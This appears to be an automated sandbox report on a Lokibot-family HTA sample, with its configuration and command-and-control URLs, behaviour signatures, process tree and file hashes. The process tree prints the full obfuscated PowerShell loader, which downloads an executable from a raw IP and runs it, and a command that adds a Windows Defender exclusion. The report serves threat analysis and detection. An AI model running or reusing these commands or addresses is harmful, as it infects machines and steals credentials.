Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-11-2024 07:26
Static task
static1
Behavioral task
behavioral1
Sample
9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac.hta
Resource
win10v2004-20241007-en
General
-
Target
9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac.hta
-
Size
23KB
-
MD5
ec0d423a3f72d69975a1e31a275f5377
-
SHA1
213922fb8456ecaadc24889afec1ac6ef5010c68
-
SHA256
9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac
-
SHA512
8132f567abfd4e3489204d1f3a9fc8292457ce10495345cd0ccfa8074233411c8305c4d73078a7dee02b086fbc22b8ad7047dd4bc127de337d0800771edf53ad
-
SSDEEP
96:C2vy2KJTuvPTTwduJZA6/3P42e2+ip2k+:TLwuv6QP5f+F3
Malware Config
Extracted
lokibot
http://94.156.177.41/maxzi/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2344 poWERShell.eXe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1640 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 2344 poWERShell.eXe 1792 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 2592 wininit.exe 1632 wininit.exe -
Loads dropped DLL 3 IoCs
pid Process 2344 poWERShell.eXe 2344 poWERShell.eXe 2344 poWERShell.eXe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook wininit.exe Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wininit.exe Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wininit.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2592 set thread context of 1632 2592 wininit.exe 40 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wininit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language poWERShell.eXe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2344 poWERShell.eXe 1792 powershell.exe 1640 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2344 poWERShell.eXe Token: SeDebugPrivilege 1792 powershell.exe Token: SeDebugPrivilege 1640 powershell.exe Token: SeDebugPrivilege 1632 wininit.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 2500 wrote to memory of 2344 2500 mshta.exe 30 PID 2500 wrote to memory of 2344 2500 mshta.exe 30 PID 2500 wrote to memory of 2344 2500 mshta.exe 30 PID 2500 wrote to memory of 2344 2500 mshta.exe 30 PID 2344 wrote to memory of 1792 2344 poWERShell.eXe 32 PID 2344 wrote to memory of 1792 2344 poWERShell.eXe 32 PID 2344 wrote to memory of 1792 2344 poWERShell.eXe 32 PID 2344 wrote to memory of 1792 2344 poWERShell.eXe 32 PID 2344 wrote to memory of 2728 2344 poWERShell.eXe 33 PID 2344 wrote to memory of 2728 2344 poWERShell.eXe 33 PID 2344 wrote to memory of 2728 2344 poWERShell.eXe 33 PID 2344 wrote to memory of 2728 2344 poWERShell.eXe 33 PID 2728 wrote to memory of 2848 2728 csc.exe 34 PID 2728 wrote to memory of 2848 2728 csc.exe 34 PID 2728 wrote to memory of 2848 2728 csc.exe 34 PID 2728 wrote to memory of 2848 2728 csc.exe 34 PID 2344 wrote to memory of 2592 2344 poWERShell.eXe 37 PID 2344 wrote to memory of 2592 2344 poWERShell.eXe 37 PID 2344 wrote to memory of 2592 2344 poWERShell.eXe 37 PID 2344 wrote to memory of 2592 2344 poWERShell.eXe 37 PID 2592 wrote to memory of 1640 2592 wininit.exe 38 PID 2592 wrote to memory of 1640 2592 wininit.exe 38 PID 2592 wrote to memory of 1640 2592 wininit.exe 38 PID 2592 wrote to memory of 1640 2592 wininit.exe 38 PID 2592 wrote to memory of 1632 2592 wininit.exe 40 PID 2592 wrote to memory of 1632 2592 wininit.exe 40 PID 2592 wrote to memory of 1632 2592 wininit.exe 40 PID 2592 wrote to memory of 1632 2592 wininit.exe 40 PID 2592 wrote to memory of 1632 2592 wininit.exe 40 PID 2592 wrote to memory of 1632 2592 wininit.exe 40 PID 2592 wrote to memory of 1632 2592 wininit.exe 40 PID 2592 wrote to memory of 1632 2592 wininit.exe 40 PID 2592 wrote to memory of 1632 2592 wininit.exe 40 PID 2592 wrote to memory of 1632 2592 wininit.exe 40 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wininit.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wininit.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe"C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xg6ussaw.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBAB8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBAB7.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2848
-
-
-
C:\Users\Admin\AppData\Roaming\wininit.exe"C:\Users\Admin\AppData\Roaming\wininit.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wininit.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
C:\Users\Admin\AppData\Roaming\wininit.exe"C:\Users\Admin\AppData\Roaming\wininit.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1632
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54d3cd0ff27b6273abc1b4e53c25da880
SHA1f7446051b9bd475ebb9a03fc761647f1a44d15bf
SHA256f3c6bf735802939bd5f6bfdedf137903bb17bd5c9257757a2266388a2a4fee17
SHA512d65b5546965719f347fe9b3918fa627a78e98a75ccc082dd7fe5d4334c3c92cda25110d5cda1e0cbdfc693eedaa7241b47f2416c4983e62d6f44a3e2bd7af577
-
Filesize
3KB
MD5a63a9231533f816cf4119b719d54ed9a
SHA154728a75c9782428c42961dff5be24ee6eb214ee
SHA25639deb01682c30d2ebc62635e1e3ccfc3ef9597c7e5d7e27aafd1dfa6c226e9b4
SHA512e90d05f116eb468d873ed422f2b804800edf98c55ad61441f69876632a6280a79d6f32b458b9f8b59afe134654c5debe8561b39108fcaf0ad4b545c1cc4919d1
-
Filesize
7KB
MD56cbeb9ef7ac5b775fa164e8935f7cc5a
SHA1615663e554433213cfce2a58a4f849a837f2efd7
SHA256577e198389bfd60bdf277c9889201d32bc6cfccaa3c3d3c3452e8b120135d8d4
SHA512c9b1c6bc8927ae7e44732c332e71b14b57556ce97f9e7248050e4df0de6be1ea4a3fb7874b12b649dc6f91e26cbdec3995befeb5d18041512fc2216e454cc3a0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3533259084-2542256011-65585152-1000\0f5007522459c86e95ffcc62f32308f1_38b42d9b-3e83-45f4-8789-a30be34574b0
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3533259084-2542256011-65585152-1000\0f5007522459c86e95ffcc62f32308f1_38b42d9b-3e83-45f4-8789-a30be34574b0
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5b60323869308c029c8130bb43a17b47b
SHA1f9cc256d7a6ae26cf8fecf13099c71b0efb3f653
SHA256372b6ae3b0d26019669776f8661e18677e2ab8c2b0ed709adb836a140381893f
SHA512f37b316819f9bbde0cdf4d5c1127c25f28ed413e88a66b3f93ed7cde6bf807a91dad0dd63bbb336806de0df8de4c7b68e16f453f3605f6aa9014c45adbac5da0
-
Filesize
652B
MD58a0f117efcba70b1f76207e659d59e00
SHA19dcab9ed61fb957fff46341a54a36a3d5a66f533
SHA2560f1aebf4d7fd16d624d208fa44852da244f753684f815940aa702b140eff2dc8
SHA512e6ab10473fc1284b70e7ca1b3cd81ffb86794b06809212ff8b9375e909f92fd52f658f808f9a6f9f072485b69e0b7966c9991a92a987e1551af934391e89fe20
-
Filesize
480B
MD5b0517586f4097114e790c61f2685f0d5
SHA120f7482298ab96731228ebd5242ceddfd72ff50f
SHA256a738e3af6f29edd637630b0299f306056042ea1c73850eee95498499f5d90237
SHA512c28702017ce7fe0d34bea38cef48df3bb65c63d92dddd6f8264f7262f7ae61b8d71bcd6fec06d0792373d15ba84fb2a1d0c26b0fe5755bc20505a9197d654ba0
-
Filesize
309B
MD5edbbb43c0ddb7c5ea8512c072793d005
SHA16ffdb680d1087f137d77ec377b7a0facd7db1af3
SHA2560e01a563d2425e8e6a168f642793904f386c8df2dec873e6df1900e6fe6f36cd
SHA512dddc4a070ccac3b6dd1837e3ed773db3241872ea14deb2a17c01fabfaed4d7ced3e7bc6d89128b030acfa477c200a2f9b8846279a3733e9f4793058ffdf9f792
-
Filesize
586KB
MD566b03d1aff27d81e62b53fc108806211
SHA12557ec8b32d0b42cac9cabde199d31c5d4e40041
SHA25659586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4
SHA5129f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d